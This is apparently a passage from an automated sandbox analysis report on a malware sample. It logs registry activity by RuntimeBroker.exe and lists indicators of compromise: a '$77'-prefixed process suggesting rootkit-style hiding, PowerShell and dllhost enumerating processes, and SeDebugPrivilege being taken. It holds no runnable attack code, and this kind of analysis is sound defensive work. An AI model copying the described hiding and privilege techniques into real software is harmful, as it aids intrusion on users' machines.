Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bdcce378-459d-4940-b = 45224fb936f4da01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b181e724-291a-4764-8	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\78bb8552-1536-44cc-b = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25c46d9e-e895-4257-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3a69627b-9c76-4af8-9 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000009369aeb936f4da0182e6ceba36f4da0182e6ceba36f4da0127f402000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000001659420f2000303637623330636636613033613133333234306461356131363635323239663330623930633433623233613964396631383135303064303762663366386332350000b20009000400efbe1659420f1659420f2e000000000000000000000000000000000000000000000000008ba96000300036003700620033003000630066003600610030003300610031003300330032003400300064006100350061003100360036003500320032003900660033003000620039003000630034003300620032003300610039006400390066003100380031003500300030006400300037006200660033006600380063003200350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000edb8e7351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30363762333063663661303361313333323430646135613136363532323966333062393063343362323361396439663138313530306430376266336638633235000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000070766d6e756476640000000000000000cc2198eae58ba9489e53a10db429f6416b0c4c47d350ef119912da2e3a28ca1bcc2198eae58ba9489e53a10db429f6416b0c4c47d350ef119912da2e3a28ca1bce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003700380036003200380034003200390038002d003600320035003400380031003600380038002d0033003200310030003300380038003900370030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000080ecc9f1000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\60a1b1c2-8c4b-4a52-8	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d699b5aa-102b-4ada-8	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bdcce378-459d-4940-b	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c1864e97-f790-486b-8 = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25c46d9e-e895-4257-b = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0aea7dcd-471b-4f06-9	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b181e724-291a-4764-8 = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c1864e97-f790-486b-8 = "\\\\?\\Volume{F1C9EC80-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\88f3777a7800453f8953d461f80504f6bbd527c39b45a9748aa23ed447788e8e"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9499817c-c882-42c5-a	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9499817c-c882-42c5-a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000660b4fb936f4da01660b4fb936f4da01660b4fb936f4da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000001659420f2000643331323065343963313839363763363564313566376337663763393931396565376536613138646663323561376663343635303334363536623461636166620000b20009000400efbe1659420f1659420f2e000000000000000000000000000000000000000000000000009ad24800640033003100320030006500340039006300310038003900360037006300360035006400310035006600370063003700660037006300390039003100390065006500370065003600610031003800640066006300320035006100370066006300340036003500300033003400360035003600620034006100630061006600620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000edb8e7351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64333132306534396331383936376336356431356637633766376339393139656537653661313864666332356137666334363530333436353662346163616662000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000070766d6e756476640000000000000000cc2198eae58ba9489e53a10db429f641620c4c47d350ef119912da2e3a28ca1bcc2198eae58ba9489e53a10db429f641620c4c47d350ef119912da2e3a28ca1bce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003700380036003200380034003200390038002d003600320035003400380031003600380038002d0033003200310030003300380038003900370030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000080ecc9f1000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\162adac6-1fae-4d40-b = "\\\\?\\Volume{F1C9EC80-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\df8b772704665936e1d2d6b39df3aa3a9e1b1038cccfaaa1e730dbe447056622"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c1864e97-f790-486b-8 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000ff40c6b936f4da0179c54bba36f4da0179c54bba36f4da019bb40b000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000001659420f2000383866333737376137383030343533663839353364343631663830353034663662626435323763333962343561393734386161323365643434373738386538650000b20009000400efbe1659420f1659420f2e0000000000000000000000000000000000000000000000000017e73c00380038006600330037003700370061003700380030003000340035003300660038003900350033006400340036003100660038003000350030003400660036006200620064003500320037006300330039006200340035006100390037003400380061006100320033006500640034003400370037003800380065003800650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000edb8e7351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38386633373737613738303034353366383935336434363166383035303466366262643532376333396234356139373438616132336564343437373838653865000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000070766d6e756476640000000000000000cc2198eae58ba9489e53a10db429f641680c4c47d350ef119912da2e3a28ca1bcc2198eae58ba9489e53a10db429f641680c4c47d350ef119912da2e3a28ca1bce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003700380036003200380034003200390038002d003600320035003400380031003600380038002d0033003200310030003300380038003900370030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000080ecc9f1000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bdcce378-459d-4940-b	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c80b9014-0b83-4f30-a	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\78bb8552-1536-44cc-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c1864e97-f790-486b-8	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d699b5aa-102b-4ada-8	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d699b5aa-102b-4ada-8 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a107acb936f4da0133b057ba36f4da0133b057ba36f4da015ffd02000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000001659420f2000646264623264646238616430616231656265313831393334386165393834663363646231373262306330353531366264646439633765613938633635613664370000b20009000400efbe1659420f1659420f2e00000000000000000000000000000000000000000000000000c8f94f00640062006400620032006400640062003800610064003000610062003100650062006500310038003100390033003400380061006500390038003400660033006300640062003100370032006200300063003000350035003100360062006400640064003900630037006500610039003800630036003500610036006400370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000edb8e7351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64626462326464623861643061623165626531383139333438616539383466336364623137326230633035353136626464643963376561393863363561366437000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000070766d6e756476640000000000000000cc2198eae58ba9489e53a10db429f641690c4c47d350ef119912da2e3a28ca1bcc2198eae58ba9489e53a10db429f641690c4c47d350ef119912da2e3a28ca1bce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003700380036003200380034003200390038002d003600320035003400380031003600380038002d0033003200310030003300380038003900370030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000080ecc9f1000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3a69627b-9c76-4af8-9 = c73eeaba36f4da01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9499817c-c882-42c5-a = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3a69627b-9c76-4af8-9	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25c46d9e-e895-4257-b = 17f9deba36f4da01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25c46d9e-e895-4257-b = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\60a1b1c2-8c4b-4a52-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9499817c-c882-42c5-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\78bb8552-1536-44cc-b	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\48d4fa83-d625-4b23-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c1864e97-f790-486b-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25c46d9e-e895-4257-b	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\78bb8552-1536-44cc-b	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\48d4fa83-d625-4b23-8	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b181e724-291a-4764-8	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9499817c-c882-42c5-a = 05c654b936f4da01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9499817c-c882-42c5-a = "\\\\?\\Volume{F1C9EC80-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d3120e49c18967c65d15f7c7f7c9919ee7e6a18dfc25a7fc465034656b4acafb"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9499817c-c882-42c5-a = "0"	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3996	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe
3996	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe
4324	powershell.exe
4324	powershell.exe
4124	$77master.exe
4124	$77master.exe
2488	powershell.exe
2488	powershell.exe
4124	$77master.exe
4124	$77master.exe
4488	powershell.EXE
4488	powershell.EXE
4488	powershell.EXE
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
4124	$77master.exe
4124	$77master.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe
952	dllhost.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	4488	powershell.EXE
Token: SeDebugPrivilege	4488	powershell.EXE
Token: SeDebugPrivilege	952	dllhost.exe
Token: SeShutdownPrivilege	3380	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	3380	mousocoreworker.exe
Token: SeShutdownPrivilege	3380	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	3380	mousocoreworker.exe
Token: SeShutdownPrivilege	3980	RuntimeBroker.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	3380	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	3380	mousocoreworker.exe
Token: SeShutdownPrivilege	3380	mousocoreworker.exe
